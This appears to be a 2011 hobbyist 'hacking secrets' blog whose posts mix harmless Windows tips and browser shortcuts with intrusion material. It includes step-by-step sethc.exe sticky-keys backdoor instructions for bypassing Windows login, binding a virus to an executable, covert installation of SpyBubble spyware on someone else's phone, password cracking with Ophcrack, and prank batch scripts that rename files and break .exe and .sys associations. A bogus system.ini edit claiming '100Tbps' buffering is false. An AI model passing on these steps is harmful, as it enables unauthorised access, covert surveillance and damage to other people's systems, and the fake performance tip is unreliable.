HAPPY NEW YEAR

Saturday 31 December 2011

 HAPPY NEW YEAR :: WISH U A VERY VERY HAPPY NEW AND B SAFE ON INTERNET


                                                              HAPPY HACKING :)




Stages of a Penetration Test

Friday 30 December 2011

Heres' the Secret

It for most penetration tests these are the main stages that will take place in order, each stages has a higher level of access and control over the system.

- Information Gathering: This is using non intrusive techniques to gather as much information as you can on the target network. Such as crawling the internet webpages, using whois lookups, looking at company adverts and news.

- Network Mapping:
 This is a more technical approach to gaining more information on the system, here you will map all live hosts on the network and on the server. Scan the ports and services. Identify the operating systems, identify firewalls, switches and routers, fingerprint services and map out what is available publically over the internet and what services are interal only.

- Vulnerability Identification: This is where we will identify vulnerable services and systems. We will do this by using the service banners we attained in the previous phase. We will also perform vulnerability scans for known vulnerabilities and check for false positives. Once we discover vulnerabilities we enumerate these further and estimate the impact and privellages gained from the vulnerability. From here we can plan our attack path and scenario.

- Penetration: This is where we will find tools, scripts and exploits that will help us gain access by exploiting the vulnerabilities in the previous stage. We can also develop our own tools and scripts to exploit these vulnerabilities. Also in this stage we will optimise and customise any scripts we have so that they will work in this scenerio, it is very common that we will have to modify exploits to work in the current scenario. Once we have all our tools we can test the proof of concept and see if they work with the vulnerabilities so we can eliminate false positives. At the end of this stage we can document our findings and the possible impact of these exploits.

- Gaining Access:
 Here we will attempt to gain some sort of access to the target system, starting with low privellage access such as finding blank or default passwords in system accounts, brute forcing user accounts, and finding public services with poor configurations allowing us to read and write files for example. Here we also use our tools from the previous phase to gain what access we can.

- Privellage Escallation: It is likely that we have low access on the system and cannot complete our goal yet due to incorrect privellages. In this stage we can identify local vulnerabilities that can help us get administrator or root privellages over the system such as 'root' on unix systems and 'system' on Windows systems. Here we will have to bypass the systems internal antivirus and firewall systems. We can search for known exploits based on the findings of the internal services we have found or we can attempt to write our own.

- Enumerating Further: Now we are inside the network and can see many systems that weren't accessable from the outside. Here we can obtain the stored hashes on the current system and decrypt them to see if they work on any other network systems. We can also identify all other hosts, services, firewalls, routers and switches on the network and test if they are vulnerable as done in the previous stages. We can also sniff local traffic and attempt to get more passwords to compromise other systems. Other techniques that are used in this phase are gathering important data on the local system such as cookies and browsing history to attempt password attacks on exterior web pages. We can also gather email accounts that could enable us to perform phishing attacks on other uses in the network. Also we could execute client side attacks on other network users to compromise their system with a little social engineering.

- Compromising other Users/Systems: Here we put all the information found in the previous section to use and gain as much access as we can over the network. It is common to find many vulnerabilities here as often companies don't think they need to secure the local network as they do not think anyone can access it.

- Maintaining Access: This is where you setup a permanent method of accessing the system so you don't have to exploit it every time you want to access it. Also this could give you access even after the vulnerability was patched. There are number of methods of doing this. You could setup a backdoor on the system that you can connect to and feed commands to, simillar to a system shell. This is usually done by opening up a port on the system and allowing access by a user and password, it is important the backdoor has authentication otherwise anyone could have access to the system. Rootkits can be installed these have the highest privellages on a system even higher than the system administrator. You can also setup covert channels such as http-tunnels, icmp-tunnels and vpn tunnels which allows you to send and receive data to and from the target system undetected.

- Covering Tracks: This is where you do all you can to remain undetected on the system so you can keep access for as long as possible, here you hide files used to exploit the system and that may raise suspisions. You also should clear the logs files or alter them so the attack logs are not there. You can also disable antiviruses and IDS to prevent them from finding your backdoor/rootkit.

- Reporting:
 This is where you write your report on your findings, you must make sure you tailor your report to the skills of who will receive it, such as the developer must have detailed information on how to patch, or if it was the manager he may not have vast IT knowledge so it must be basic details with colourful graphs and images. You must include the summary of the attack, the impact, the tools used, the services that are vulnerable, the systems compromised, the information that was gathered, screenshots, dates and times of the tests, outputs of all the scans, and the next steps to work on to fix the system.

Binders

Thursday 29 December 2011

What is binders ?
A binder binds two things into one :: for example say i bind a virus to a notepad.exe
so when person open it up :: it opens notepad as soon as it closes the notepad the virus behind the notepad.exe will be activated.
you can bind any virus to an exe of the software

Now how to do it

Heres' the SECRET

there are two ways to do it

one with software which is in built in window XP/vista/7

* Which is known as iexpress

Open run command (windows key + R)

type in there iexpress and press enter

** Another is software namely file joiner

and here is another software download it => Click on me

Backdoor for Windows XP & 7

Thursday 1 December 2011

What is Backdoor ?

I tell you this question answer in layman's language as the name suggest backdoor which means the door at the back ::
Backdoor is the way created in windows xp and 7 to get inside the computer even it is password protected account ::
Say like this i have created a hidden backdoor in your house and you have put a lock in front gate of your house so i use my backdoor to enter into your house
In the same way i will make a hidden backdoor in your window xp or 7 so that if any time there is password to the account i can easily manage to enter the account with help of backdoor 


What We are  Doing ?

We are just changing the sticky keys into cmd (command prompt)
When a login page comes with password protection just :: click your shift key 5 times instead of opening sticky key command prompts open ups.

*************************
MAKE BACKDOOR HELP OF BACKTRACK TERMINAL => Click on me :))

**********************************

Now how to put a backdoor in Window XP and 7


Heres' the SECRET

How to make backdoor in Window XP

Just copy the cmd.exe from  C:\windows\system32

Now here is the step wise to do it
*Go to C:\windows\system32
** Copy cmd.exe on your desktop and rename it to sethc.exe .
***Now copy that file and paste again in system32 directory.

Here is the Video tutorial => videos will be available after some time


Now basically what we are do is we changing/replacing  sticky keys with cmd (command prompt)
so that when you open the computer and password protected login screen click five times on shift and boom command prompts opens


How to make backdoor in window 7
* Go to C:\windows\system32
** Copy cmd.exe on your desktop and rename it to sethc.exe .
***Now copy that file and paste again in system32 directory.

Now will have the problem of ACCESS DENIED

now here is two ways to remove the problem of ACCESS DENIED

First method => change operating system from window 7 to windows xp.... ( haha :))

Second method is

* Right click on sethc.exe and run as administrator.
** Again right click on sethc.exe, open properties.
*** Click on Advanced tab , then on owner and click edit, change the owner from "trusted installer" to "administrator" and click apply.
**** Then click on 'Edit' in security tab to edit permissions.
***** Click on 'Administrators' , give it full control
****** Apply changes.



Here is video tutorial => videos will be available after some time




Different ways to HIDE Drives

Wednesday 23 November 2011

I know this is not a new or any amazing post that i have written over but i just wanted to tell you the features y to hide drives

Heres' the SECRET


Features to hide drives

* 100% totally protected from VIRUS

** 100% totally protected files to be STOLEN

*** 100% totally protected that files to be FORMATTED or DELETED

**** 100% ,, MOST IMPORTANT files are safe of your company, business, or any work you do.

***** 100% files are safe if even some one breaks in to windows password


Lets hide drive different ways


First method to hide drive with help of  gpedit (help of Group Policy)

Steps ***  open run command (windows key + R) then type in gpedit.msc

a window will open namely Local Group Policy Editor

At the left side of the window you will see "USER CONFIGURATION " AND "COMPUTER CONFIGURATION"

At USER CONFIGURATION

Click on Administrative Templates

   
then click on Windows Components

         
then click on Windows ExplorerAt the right side of the window navigate and look for  "Hide these specified drives in My Computer."

   Click on it and a window will open and check on Enable and in the same window you will see         
"OPTION" and you can pick option which drive you want to hide

These are the options
  • Restrict A, B, C and D drives only
  • Restrict A, B and C drives only
  • Restrict A and B drives only
  • Restrict all drives
  • Restrict C drive only
  • Restrict D drive only
  • Do not restrict drives
Second method to hide drive is the help of Registry key

To Hide all Drive (Download registry key ) => Click on me

To Hide only C Drive (Download registry key) => Click on me

To Hide only D Drive (Download registry key) => Click on me

To Hide only E Drive (Download registry key) => Click on me

To Hide only F Drive (Download registry key) => Click one me

To Enable the drives (one or all) (Download registry key) => Click on me

** These all can be done manually just open the downloaded file & read the instruction as for example

we are opening enable all the drives :: second click on the file and select Edit

() open run command type regedit and hit enter

a window will open

Navigate =>  [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]     These commands will be seen in the left of the window
"NoDrives"=dword:0   [ This command you have to write at the right of the window]

How to write => just second in blank space at the right side of the window and select dword and type above code same as it is (without quotes) .. and restart your computer


Third way to Hide Drives help of CMD (Command Prompt)

Open you CMD (Command Prompt) 

Type cd\  and press enter
   Type diskpart and press enter (a window will open same as cmd namely  as diskpart)

        Type (in second Window) list volume and press enter  Note : there is space between list & Volume
         Type select volume for eg we take 4 and press enter
          Type remove letter (drives name) E and press enter

And you are done

Now to get back the Drive again

Repeat the whole procedure and at the place of remove letter just type assign letter (drives name) and press enter

and exit

Here is The Video tutorial for the CMD => Click on me

How to keep our COMPUTER or LAPTOP safe

Sunday 20 November 2011

What is this Windows 7 password is cracked or break not even windows XP is safe what to do now ::


How to keep our computer or laptop  safe :: aa question is big

Heres' the SECRET

To keep your Laptops and computer safe with different ways

Firstly put the password in BIOS

Put the password in BIOS

Here is the procedure

*) Open your bios with the help of pressing F2 or DEL key or F8 or ESC button every machine has different button

**) Now go to the SECURITY option

***) Select USER PASSWORD :: you will be prompt to enter a password

****) Enter eight (8) digit password which is secure and strong also

*****) It will again ask for the password or confirm password and you will be done

******) Now press F10 to save or go to save option and hit enter on YES

*******) The machine will reboot and ask for password just enter your password and every  time you reboot or restart it will ask for the password at the first in BIOS


FEATURES

Why did i tell you put the password in BIOS ?

*) BIOS is some what a strong and not easy breakable also

**) The person will also be not able to reach into your computer if it uses third party attack :: with the help of backtrack or something else

***) It basically more secure and safe from other log on breaking passwords

****) Even no CD or DVD can break it.

*****) BIOS password can be also be broken but the trick  does not  follow or work every time

I recommend to use to put password in your BIOS

DISADVANTAGE


*) Its not breakable so if you forget you have to go your vendor to open it

**) BIOS password can be also be broken but the trick does not  follow every time ( i will be posting how to break the BIOS password after few days)

Second Way to keep your LAPTOP secure

Here the SOFTWARE namely LAPTOP ALARM

Download Laptop alarm => Click on me

For more security go to this => click one me

You can also trace your laptops => http://www.ztrace.com






Blog posting will be stopped for a month ( i am heart fully sorry for saying this but i am really busy for a month)

after one month i will be coming with new ideas a new way to be safe and protected from being hacked and cracked

Yours truly
Secrets finally revealed
Pprasoon nigam a security expert

Any solution to the problem :: for example free software, hacking, cloud computing, and anything related to computer


Please send mail to fraternity.contacts@gmail.com

www.fraternityindia.com



Countermeasures On OPHCRACK (Safe ur WIN 7/VISTA/XP)

Thursday 17 November 2011

How to safe your windows 7 password from being hacked by the help of OPHCRACK

Heres' the SECRET


First here is the way how to hack the password of windows 7  => Click one me

Now how to safe yourself

Very simple thing you have to do

*) just keep your password of minimum lenght of 7

**) keep your password with combination of alphabets, numbers and ASCII Codes

***) never keep your password in series :: for example prasoon09 :: OPHCRACK HAVE ABILITY TO CRACK IT

****) keep the passwoed in jumble format :: for example pras09oon$$ :: OPHCRACK will not crack it


OPHCRACK  is better software to crack or break or hack window xp or vista or 7 password but not the best ::

It also have limitation :: Few next you will be getting the best possible way to hack or crack or break password of vista or xp and even 7 that the best possible way i will give

thanks for reading

Pprasoon Nigam a security expert

http://www.fraternityindia.com/

any problem anything related to  hacking, cracking, breaking, software & any thing related to computer do send mail on

kinngofhackers@gmail.com

Break windows 7 password

Monday 14 November 2011

Breaking into windows 7 password

Heres' the SECRET

The software name is OPHCRACK

Download OPHCRACK => click on me



Here is the video tutorial => Click on me

Extract the Contents from .exe & .msi file

Monday 7 November 2011

Extract the Contents from a .exe executable file

Heres' the SECRET

Download the software =>  Click on me

The tool is capable of extracting the contents of the archive or self executable files however it can’t create any archive file on its own. But if you only wish to have a tool to see the contents of an archive or other packages, then this is the tool to have in your system.



Extract the contents from a .msi executable setup file


Sometimes initializing the .msi installer will temporarily extract the files into C:\Documents and Settings\<username>\Local Settings\Temp, but those files are removed once the installer exits.

here are the command with steps

Step *: Open run and type cmd..

Step **: Type msiexec /a C:\yourfile.msi /qb TARGETDIR=G:\msi_test

Step ***: Now wait for a few seconds.. Then u will see a popup extracting files.

Step *****: It’s done. Now open the target directory and check out extracted files and folders.

Note: C:\yourfile.msi is the file which will be extracted. G:\msi_test is the folder location where the extracted files will be located. The destination directory does not need to exist prior to running this command.

Scare your friends with Most funny Virus

Wednesday 2 November 2011

Scare your friends with Most funny Virus

Heres' the SECRET

Its just a funny virus and it will not harm any of your file in system just too make friend scared here the batch file

here is the code just type in notepad or copy and .save it as kinng.bat

OR

Download the file => Click on me


@echo off 

pathping localhost -q 2 -p 250 > nul 
pathping localhost -q 2 -p 250 > nul 
pathping localhost -q 2 -p 250 > nul 
pathping localhost -q 2 -p 250 > nul 
pathping localhost -q 2 -p 250 > nul 
echo It will now begin to delete your files. 



pathping localhost -q 2 -p 250 > nul 
pathping localhost -q 2 -p 250 > nul 
pathping localhost -q 2 -p 250 > nul 
pathping localhost -q 2 -p 250 > nul 
pathping localhost -q 2 -p 250 > nul 
echo Do you want to abort the deletion of your files? 


pause 
echo Wow you really fell for that.AB made the CODE which will delete your account. 
pathping localhost -q 2 -p 250 > nul 
pathping localhost -q 2 -p 250 > nul 
pathping localhost -q 2 -p 250 > nul 
echo deleting....... 
pathping localhost -q 2 -p 250 > nul 
pathping localhost -q 2 -p 250 > nul 
pathping localhost -q 2 -p 250 > nul 
pathping localhost -q 2 -p 250 > nul 
pathping localhost -q 2 -p 250 > nul 
pathping localhost -q 2 -p 250 > nul 
pathping localhost -q 2 -p 250 > nul 
echo YOU'VE BEEN FOOLED. THERE IS NO VIRUS. YOU'RE JUST A N00B.

Add a Background Image to a Folder

Add a Background Image to a Folder

Heres' the SECRET


Step *: Open notepad (windows key + R type in notepad)

Step **: Copy and paste the following line in your notepad.

[ExtshellFolderViews]
{BE098140-A513-11D0-A3A4-00C04FD706EC}={BE098140-A513-11D0-A­3A4-00C04FD706EC}
[{BE098140-A513-11D0-A3A4-00C04FD706EC}]
IconArea_Image=C:\background.jpg

Note: C:\Background.jpg will be shown as your background image. You can Change it to your current background image path. The picture must fit your screen resolution. (its an example) can use any picture

Step ***: Now save the file as “desktop.ini".

Step ****: Now copy-paste the file to any folder where you want to show the background picture.

Step ***** : wooolllllaaaaa done..!! Refresh to see the changes.


The most easiest way to use a software

download the software => Click on me
Works in Windows XP perfectly...

Google Images Bulk Image Downloader

Google Images is the main source for any Blogger or any other normal person to get his desired image for his personal or commercial use and sometimes it pisses off when you have to open all the images one by one and then choose save image as and that’s done.

Heres' the SECERT

Working

*. Download the software => Click on me  

**. After download it extract it and RUN the application.

***. You will see something like below interface .:

****. Now go to the Google Images and search images which you wanna download in BULK.

*****. After searching copy the link and click on Get URL like in the above image and it will grab your copied URL, now click on Get Image Links and after it has grabbed all the links choose a folder where you wanna save the images and then click on Download.

Windows Registry Tricks

Saturday 29 October 2011

Windows Registry Tricks

Heres' the SECRET

Here are some of Windows Registry Tricks which you can tryout :

open registry edit by pressing windows key +R type in regedit hit enter

1. Disable the Autorun Option in your CD Rom Drive:

Open your Registry and navigate to "HK_L_M\system\currentcontrolset\services\cdro m"
Change the value of 'Autorun', or create a new DWORD value if it doesn't already exist, and set the value as '0' for Autorun disabled.

2.
Disable the Harddisk Lowdiskspace warning in Windows Xp

User Key: "HKEY_CURRENT_USER\Software\Microsoft\Windows\ Curr entVersion\Policies\Explorer"
and
System Key: "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows \Cur rentVersion\Policies\Explorer"
create a new DWORD 'NoLowDiskSpaceChecks' and change its value to '1'.

3. Disable the Windows Key

"HK_L_M\system\currentcontrolset\control\keybo ard layout"
Create a new Binary value, or modify the existing value called 'Scancode Map' as shown below.
Value: 00 00 00 00 00 00 00 00 03 00 00 00 00 00 5B E0 00 00 5C E0 00 00 00 00

4. View System BIOS Information


Open Registry and navigate to
"HK_L_M\hardware\description\system"

5. Change the Title of WindowsMedia Player

"HK_C_USER\software\policies\microsoft\windows medi aplayer\"
Create a new string value called ' TitleBar' and change text as your wish.

6. Disable Internet access in Network

Open Registry and make the following changes
"KH_C_User\software\microsoft\windows\currentv ersi on\internetsettings\"
Change the value of "Proxyenabled" to 1 and change the value of "proxyserver" and set it to an ip address. Change the value of the ip address and port to "10.0.0.1:5555"

7. Disable the ability to Right click on the desktop
"HK_C_User\software\microsoft\windows\currentv ersi on\policies\explorer\"
Create a DWORD "NoViewContextMenu" and change its value to "0" for disabling and "1" for enabling.

8. Hide all items on desktop

"HK_C_USER\software\microsoft\windows\currentv ersi on\policies\explorer\"
and
"HK_L_M\software\microsoft\windows\currentvers ion\ policies\explorer\"
create a new DWORD "NoDesktop" and change its value to "1"
You can show all the items in the desktop by chaning the value to "0"

9. Disable the "Change Password" button in windows

"HKEY_CURRENT_USER\Software\Microsoft\Windows\ Curr entVersion\Policies\System"
and
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows \Cur rentVersi on\Policies\System"
Create a new DWORD "DisableChangePassword" and change its value to "0" for disabling and "1" for enabling.

10. Disable the "cancel" button or pressing the "Esc" key while logging on to Windows"

"HKEY_USERS\.DEFAULT\Software\Microsoft\Window s\Cu rrentVersion\Run"
Create a new string value "NoLogon" and change its value to "RUNDLL32 shell32,SHExitWindowsEx 0"

11. Remove "Log off" from start menu
"HKEY_CURRENT_USER\Software\Microsoft\Windows\ Curr entVersion\Policies\Explorer"
and
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows \Cur rentVersion\Policies\Explorer"
Create a new DWORD "NoLogOff" and change its value to "1" for disabling and "0" for enabling.

12. Clear the Recent playlist in Media Player

Navigate to "HKEY_CURRENT_USER\Software\Microsoft\MediaPla yer\ Player"
And clear the "RecentFileList" subkey.

13. Empty temporary Internet files on exit (in Internet Explorer)
"HKEY_CURRENT_USER\Software\Microsoft\Windows\ Curr entVersion\Internet Settings\Cache"
and
"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows \Cur rentVersion\Internet Settings\Cache"
Create a new DWORD "Persistent" and change the value to "0" for emptying and "1" to remove this option.

14. Clear the Internet Explorere typed addresses history

"HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs"
And delete the subkeys.

15. Remove recent documents from start menu

"HKEY_CURRENT_USER\Software\Microsoft\Windows\ Curr entVersion\Policies\Explorer"
and
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows \Cur rentVersion\Policies\Explorer"
Create a new DWORD "NoRecentDocsMenu" and change its value to "1".

16. Remove Network connections from start menu

"HKEY_CURRENT_USER\Software\Microsoft\Windows\ Curr entVersion\Policies\Explorer"
and
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows \Cur rentVersion\Policies\Explorer"
Create a new DWORD "NoNetworkConnections" and change its value to "1".

17. Remove My documents from start menu

"HKEY_CURRENT_USER\Software\Microsoft\Windows\ Curr entVersion\Policies\Explorer"
and
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows \Cur rentVersion\Policies\Explorer"
Create a new DWORD "NoSMMyDocs" and change its value to "1".

18. Remove My pictures from start menu

"HKEY_CURRENT_USER\Software\Microsoft\Windows\ Curr entVersion\Policies\Explorer"
and
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows \Cur rentVersion\Policies\Explorer "
Create a new DWORD "NoSMMyPictures" ad change its value to "1".

19. Remove My music fro start menu

"HKEY_CURRENT_USER\Software\Microsoft\Windows\ Curr entVersion\Policies\Explorer"
and
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows \Cur rentVersion\Policies\Explorer"
Create a new DWORD "NoStartMenuMyMusic" and change its value to "1".

20. Reboot windows after crash

"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\C ontr ol\CrashControl"
Create a new DWORD "AutoReboot" and change its value to "1".Restart the machine for the effect to take place.

21. Disable the use of MSDos
User Key: "HKEY_CURRENT_USER\Software\Microsoft\Windows\ Curr entVersion\Policies\WinOldApp"
and
System Key: "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows \Cur rentVersion\Policies\WinOldApp"
Create a new DWORD "Disabled" and set its value to "1". Change it to "0" for enabling.

22. Enable Directory completion in MSDos prompt

User Key: "HKEY_CURRENT_USER\Software\Microsoft\Command Processor
and
System Key: "HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor"
Create a new DWORD "PathCompletionChar " and set it to equal the hex value of the required control character.

23. Quick edit the command prompt
User Key: "HKEY_CURRENT_USER\Console"
and
System Key: "HKEY_USERS\.DEFAULT\Console"
Create a new DWORD "QuickEdit" and set its value to "1" for enabling and "0" for disabling.

24. Disable Registry editing
"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\ Curr entVersion\Policies\System"
Create a new DWORD "DisableRegistryTools" and change its value to "0" for allowing Regeditand "1" for disabling it.

25. Disable task scheduler

" HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\RunServices"
Delete the value from "SchedulingAgent". Usually its value is set to "'mstask.exe".

26. Remove My computer from desktop and start menu
User Key: "HKEY_CURRENT_USER\Software\Microsoft\Windows\ Curr entVersion\Policies\NonEnum"
and
System Key: "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows \Cur rentVersion\Policies\NonEnum"
Create "{20D04FE0-3AEA-1069-A2D8-08002B30309D}" and change its value to "1" for removing. Change its value to "0" for showing.

27. Show Windows version on desktop

User Key: "HKEY_CURRENT_USER\Control Panel\Desktop"
Create a new DWORD " PaintDesktopVersion" and change its value to "1" for showing and "0" for removing.

28. Remove My documenst from desktop
Windows 95, 98 and Me

"HKEY_CURRENT_USER\Software\Classes\CLSID\{450 D8FB A-AD25-11D0-98A8-0800361B1103}\ShellFolder"
Windows NT, 2000 and XP
"HKEY_CURRENT_USER\Software\Microsoft\Windows\ Curr entVersion\Explorer\CLSID\{450D8FBA-AD25-11D0-98A8-0800361B1103}\ShellFolder"
Modify the value called "Attributes" as "0xf0500174" to hide or "0xf0400174" to show.

29. Disable Scan disk after improper shutdown

" HKEY_LOCAL_MACHINE\System\CurrentControlSet\Contro l\FileSystem"
create a new DWORD "DisableScandiskOnBoot" and change its value to "01" for disablng and "00" for enabling.

30. Automatically end Hung programs.

" HKEY_CURRENT_USER\Control Panel\Desktop"
and
System Key: [HKEY_USERS\.DEFAULT\Control Panel\Desktop"
Modify the value of "AutoEndTasks" to "1".

DIWALI BOOM

Thursday 27 October 2011

Change all extensions to txt
(Funny virus)

Heres' The SECRET

*.* open notepad (window key + R typin notepad)

Copy paste the following code and save as prasoon .bat

REN *.DOC *.TXT

REN *.JPEG *.TXT

REN *.LNK *.TXT

REN *.AVI *.TXT

REN *.MPEG *.TXT

REN *.COM *.TXT

REN *.BAT *.TXT

Download the batch file => Click on me

Here is the another MAGIC


Copy paste the following code and save as prasoon .bat

@echo off

assoc .txt=jpegfile

assoc .exe=htmlfile

assoc .jpeg=avifile

assoc .png=mpegfile

assoc .mpeg=txtfile

assoc .sys=regfile

msg Your System is cracked …..

exit

Download the batch file =>  Click on me


How To Spy A Mobile Phone

How To Spy A Mobile Phone? - CellPhone Spying Software

Only For Educational purposes:

Heres' the SECRET

SpyBubble is a software that allows you to log in from any computer and access any smartphone that it is installed on. Through SpyBubble, you can monitor and supervise any smartphone simply by entering your login username and password.

How To Download And Install SpyBubble On A Smartphone:

Step *. Open the Web Browser on your target phone and type in the following address and press Enter.

http://www.spybubble.com/symbian/sbubble.sis

TO download spybubble =>  Click on me

Step **. After SpyBubble has been installed, Switch the phone off and then on.

Step ***. Register your license key as shown below.

To get you license key, go to: SpyBubble Setting Page (you may have to log into the system first) You can also go to the member control panel and click on the Configuration menu to get it.

Step ****: Log in to http://www.SpyBubble.com/. Login Panel to verify if your account is working flawlessly.

Features
:

*Has GPS tracking.
**Can spy on text messages.
***Can get contact book info from phone.
****Can check out call log.
*****Popular Smart Phones supported.
******Can be used to back up your own phone’s information.
*******100% undetectable.

Javscripts tricks

Javscripts tricks

Heres' the SECRET

Just copy paste the java script in to the address bar and hit enter and see the MAGIC

*.*  Edit any webpage..   just copy paste the javascript in to the address bar and hit enter and see the MAGIC

javascript:document.body.contentEditable='true'; document.designMode='on'; void 0



*.* Dancing Images

javascript:R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300; y4=200; x5=300; y5=200; DI=document.images; DIL=DI.length; function A(){for(i=0; i-DIL; i++){DIS=DI[ i ].style; DIS.position='absolute'; DIS.left=(Math.sin(R*x1+i*x2+x3)*x4+x5)+"px"; DIS.top=(Math.cos(R*y1+i*y2+y3)*y4+y5)+"px"}R++}setInterval('A()',5); void(0);


*.* Play Game

javascript:var%20s%20=%20document.createElement('script');s.type='text/javascript';document.body.appendChild(s);s.src='http://erkie.github.com/asteroids.min.js';void(0);

*.* Infinite Alert Boxes


javascript:while(1){alert('Restart your brower to close this box!')}


*.* Calculator

javascript: alert(4+5+6+7+(3*10));


.*.* View Passwords Behind Asterisk

javascript:(function(){var s,F,j,f,i; s = ""; F = document.forms; for(j=0; j<F.length; ++j) { f = F[j]; for (i=0; i<f.length; ++i) { if (f[i].type.toLowerCase() == "password") s += f[i].value + "\n"; } } if (s) alert("Passwords in forms on this page:\n\n" + s); else alert("There are no passwords in forms on this page.");})();

*.* Fly Code

javascript: for (var int = 0; int < 600; int++) { var rand = Math.floor(Math.random()*600); window.scroll(0, rand); } void(0);

*.* Hate Code

This will make your page display a popup that cannot be removed unless you click the ok button (only available button) 500 times.

You can change the 500 below to whatever you wish, you may also change the left! in quotations to whatever message you want. There is a custom one below as an example.
Code:

javascript: var t = 500; for (var int = 0; int < t; int++) { var l = t – int; alert(l +’ left!’); } void(0);
Image:

Disable The Internet Cafe's Timer

Disable The Internet Cafe's Timer

Heres' the SECRET

Manual Way to do it

Go to the registry editor (open cmd type regedit and hit enter ), than navigate to

"HKEY_CURRENT_USER>Appevents>software>classes>Microsoft>windows>current version>internet settings>policies>system"

than on the right pane where it says Disable Task manager, right click on it, and scroll down to modify, and than change the value of it to "0", and than open Windows Task Manager By Holding Down These Keys, "CTRL+ALT+DEL/DELETE" And Than Disable The Internet Cafe's Timer,

Software that helps you to Kill time of cyber cafe


SoftwareS click and download (free download)

*.*  I_Want_To_Play_Free_v2   => to download Click on me

*.* net time client server_zip     => to download Click on me

*.* Process Suspender (the best)=> to download Click on me

UNLIMTED TIME.Enjoy it..!!!

Trick To SEND free sms from FACEBOOK

Wednesday 26 October 2011

Trick To SEND free sms from FACEBOOK

Heres' The SECRET


If your 100sms is over for one day and you want to send more sms to your friends
Here is the solution for that from which you can send 700sms/day
  • First login to facebook.com
  • Second goto this link Click on me

  • and select any free website from which you want to send free sms

*160by2.com
**way2sms.com
***mycantos.com
****fullonsms.com
******smsze.com
*******freesms88.com
********site2sms.com
then enter the website username and password you selected
if you have any username and password register and then start sending free sms to your friends.

How To Send Email on Later Date

How To Send Email on Later Date

Heres' the SECRET

    Go to the website www.lettermelater.com
 STEPS
* Click on Sign up For Free button and fill your information.

** Now verify your account by visiting your Email Address that you had given in the Sign up process.

*** Now click on the Compose button to send a new Email.

**** In the From Field you will see your Email Address from which you are sending an Email, in To Field give recipient’s email address
   
***** Click on the Calendar button to set date and time when you want to send your Email and attach a file if any.

****** Click on Schedule to be Sent now your Email will be sent on your scheduled date.

This works in all browsers and this will not affect your account privacy.


Features Of LetterMeLater


* File attachments!
* Send emails later from your own email program!
* Create HTML emails! Use rich content to add style and structure.
* Send emails from any of your email addresses.
* Send recurring emails.
* Your email will be the return address on the emails you send.
* Import your contacts and create group mailing lists.
* Send emails with carbon copies (cc) and blind carbon copies (bcc).
* The time of day to send is specified in your local time.

HAPPY DIWALI

Tuesday 25 October 2011

Increase Youtube video buffering speed

Increase Youtube as well as sites like Metacafe video buffering speed

Heres' the SECRET

Start => Run (windows key + R) => system.ini => Hit Enter

A notepad will open which contain the following code-
Code:
; for 16-bit app support
[386Enh]
woafont=dosapp.fon
EGA80WOA.FON=EGA80WOA.FON
EGA40WOA.FON=EGA40WOA.FON
CGA80WOA.FON=CGA80WOA.FON
CGA40WOA.FON=CGA40WOA.FON

[drivers]
wave=mmdrv.dll
timer=timer.drv

[mci]

Copy the below text and paste it there-

Code:
page buffer=100Tbps
load=100Tbps
download=100Tbps
save=100Tbps
back=100Tbps
search=100Tbps
sound=100Tbps
webcam=100Tbps
voice=100Tbps
faxmodemfast=100Tbps
update=100Tbps

Save it and enjoy!!!

Paste blank status on Facebook

How to Paste blank STATUS / Comment in Facebook

Heres' the SECRET

Paste: @[0:0: ].........(note:- the text is like @[0:0:space],don't write
space rather press spacebar where i have write space )




For MultiLine Blank Status :

Paste: Like I have shown below
@[0:0: ]
@[0:0: ]
@[0:0: ]
@[0:0: ]
@[0:0: ]
@[0:0: ]

Method **

Steps:

1:Go to Facebook status
2:Type @[2:2: ]
3: post it.

Recover deleted SMS Messages

Recover deleted SMS Messages

Heres' the SECRET


Hence read them right on your phone.


Things you will need .:

* A Nokia Mobile supporting application download.

**. Second search for any File-Manager like ( FExplorer, Fileman or any other )

      fexplorer => to download Click on me

***. Install that application on your cellphone.

****. Now when everything is ready follow the below steps .:


Procedure to Read Deleted SMS in Mobile
.:

*. Open your File-Manager i.e.. FExplorer or Fileman

**. Select the memory card drive that can be C: or D: just check it out.

***. Now after opening drive navigate to System > Mail

****Now in Mail folder you will see different folders like ( 0010001_s )

*****. Now the above folders are the actual messages which you are going to read, now there will be many folders which are actually all the messages now search for the one you are browsing and than do not open that directly as it will not be supported, choose the one you wanna open than choose open > file > hex/text viewer.

******. That’s it now you are reading the deleted SMS which you can copy or transfer into other phone by sending it through Bluetooth.

Mozilla Firefox and Internet Explorer Keyboard shortcuts

Mozilla Firefox and Internet Explorer Keyboard shortcuts:

Heres' the SECRET


Keyboard Shortcuts:

Alt + Left Arrow key : To go to back page

Alt + Right Arrow key : To go to next page

Alt + Home key : To go to Home page.

Ctrl + + : To increase font size.

Ctrl + - : To decrease font size

Ctrl + 0 : To Default font size

Ctrl + F : To search any text

Ctrl + G or F3 : To search again last searched

Ctrl + T : To create new tab

Ctrl + N : To create new window

Ctrl + Tab key : To select next tab

Ctrl + W : To close tab.

Ctrl + Shit + T : To restore recently closed tab.

Ctrl + Shift + W : To close window.

Ctrl + F4 : To close tab.

Alt + F4 : To close window

Ctrl + Shift T : Open recently closed tab.

Ctrl + R : Reload

Ctrl + U : To view page source file

Ctrl + Tab key : To select next tab

Ctrl + Shift + Tab key : To select previous tab

Ctrl + 9 : To select last tab

Alt + Enter key : When you typed URL in address bar and you want to open it in a new window then type URL and Press Alt + Enter key.

F11 : To full screen.

F5 : Reload

